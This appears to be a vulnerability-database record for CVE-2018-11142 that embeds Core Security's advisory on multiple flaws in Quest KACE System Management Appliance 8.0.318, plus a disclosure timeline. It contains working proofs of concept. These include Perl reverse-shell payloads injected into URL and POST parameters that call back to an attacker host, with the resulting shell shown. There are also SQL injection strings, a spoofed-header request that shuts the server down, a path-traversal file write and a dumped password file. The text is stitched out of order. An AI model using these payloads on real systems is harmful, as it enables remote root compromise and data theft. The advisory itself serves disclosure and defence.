HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin operator::2:5:System &:/:/usr/sbin/nologin bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. Path traversal in advisory.php leading to arbitrary file creation/deletion
[CVE-2018-11141] The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script can be abused to write and delete files respectively. The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64 encoded). Files can be written to any location where the 'www' user has write permissions.
File deletion could be abused to delete the '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence determines whether the appliance setup wizard is shown.
The following proof of concept demonstrates the vulnerability:
/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Using the authenticated command injection (7.2) together with the Sudo Server privilege escalation (7.4) to obtain a root shell on the appliance, we were able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline 2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form. 2018-03-05: Quest Support confirmed the receipt and requested additional information. 2018-03-12: Core Security sent a draft advisory including a technical description. 2018-03-16: Quest Support asked for the CVE-IDs. 2018-03-16: Core Security answered saying that the CVE-IDs are requested once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication channel, also copying the researchers behind this discovery. 2018-03-16: Quest Support thanked Core for its reply and stated it would be in touch during the process. 2018-03-20: Quest Support informed that they had not yet received any updates from the engineering team and had requested one. 2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information. 2018-03-21: Core replied with the affected version (which was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories. 2018-03-21: Quest Support acknowledged the information provided. 2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and the level of thoroughness and detail provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM notified Core that the work done by Core was in breach of Quest's license agreement, and requested Core not to distribute the findings to the public, otherwise Quest would take legal action. 
2018-04-13: Quest's KACE PM sent a follow up email and informed that it made a hotfix to patch the reported vulnerabilities. Quest also requested a call meeting to understand future opportunities based on the Core's company capabilities. Finally, Quest asked for information about the researcher that found the vulnerabilities and a link of Core's choosing in order to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 2018-04-16: Core answered email from 2018-03-26 stating the company is following standard practices with regards to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry standard disclosure processes that involves publication of the vulnerabilities. 2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13). 2018-04-17: Core thanked the answer and stated the willingness of keeping written communications between parties in order to better document the process and communicated the next steps of the process including: 1. Testing the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be included in the advisory and finally 4. Send final advisory version to vendor and coordinate publication date together. 
With regards to Quest's requests, Core provided the researchers' names and the URL at which the advisory would be published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked for the right contact at Quest), but that its intention was to keep that services request separate from the coordinated disclosure process. 2018-04-18: Quest Support informed that they had publicly made patches available for its customers and unilaterally closed the case. 2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0602",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 2.2,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15644"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005606"
},
{
"db": "NVD",
"id": "CVE-2018-11142"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1212"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11142"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11142",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 2.1,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-11142",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CNVD-2018-15644",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 5.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-11142",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11142",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2018-15644",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1212",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-11142",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15644"
},
{
"db": "VULMON",
"id": "CVE-2018-11142"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005606"
},
{
"db": "NVD",
"id": "CVE-2018-11142"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1212"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The \u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027 scripts in the Quest KACE System Management Appliance 8.0.318 are accessible only from localhost. This restriction can be bypassed by modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers in a POST request. An anonymous user can abuse this vulnerability to execute critical functions without authorization. Quest KACE System Management Appliance Contains an authorization vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. QuestKACESystemManagementAppliance is an IT asset management device from QuestSoftware, USA. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. 
*Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. *Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. 
\n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. \n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. 
The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. \n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. *Unauthenticated command injection*\n\n[CVE-2018-11138]\nThe \u0027/common/download_agent_installer.php\u0027 script is accessible to anonymous\nusers in order to download an agent for a specific platform. This behavior\ncan be abused to execute arbitrary commands on the system. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. 
The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. \n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: 
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. *Authenticated command injection*\n\n[CVE-2018-11139]\nThe \u0027/common/ajax_email_connection_test.php\u0027 script used to test the\nconfigured\nSMTP server is accessible by any authenticated user and can be abused to\nexecute arbitrary commands on the system. This script is vulnerable to\ncommand injection via the unsanitized user input \u0027TEST_SERVER\u0027 sent to the\nscript via POST method. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 
20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. *PHP Object Injection leading to arbitrary command execution*\n\n[CVE-2018-11135]\nAn authenticated user could abuse a deserialization call on the script\n\u0027/adminui/error_details.php\u0027 to inject arbitrary PHP objects. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. *Privilege escalation via password change in Sudo Server*\n\n[CVE-2018-11134]\nIn order to perform actions that requires higher privileges, the application\nrelies on a message queue managed that runs with root privileges and only\nallows a set of commands. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). \n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the \u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. *Privilege escalation via command injection in Sudo Server*\n\n[CVE-2018-11132]\nAs mentioned in the issue [7.4], in order to perform actions that require\nhigher privileges, the application relies on a message queue that runs\ndaemonized with root privileges and only allows a set of commands to be\nexecuted. \n\nA command injection vulnerability exists within this message queue which\nallows us to append arbitrary commands that will be run as root. \n\n7.6. 
\n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. *Unauthenticated SQL Injection in download_agent_installer.php*\n\n[CVE-2018-11136]\nThe \u0027orgID\u0027 parameter received by the \u0027/common/download_agent_installer.php\u0027\nscript is not sanitized, leading to SQL injection. In particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. *SQL Injection in run_report.php*\n\n[CVE-2018-11140]\nThe \u0027reportID\u0027 parameter received by the \u0027/common/run_report.php\u0027 script\nis not sanitized, leading to SQL injection. In particular, an error based\ntype. 
\n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. 
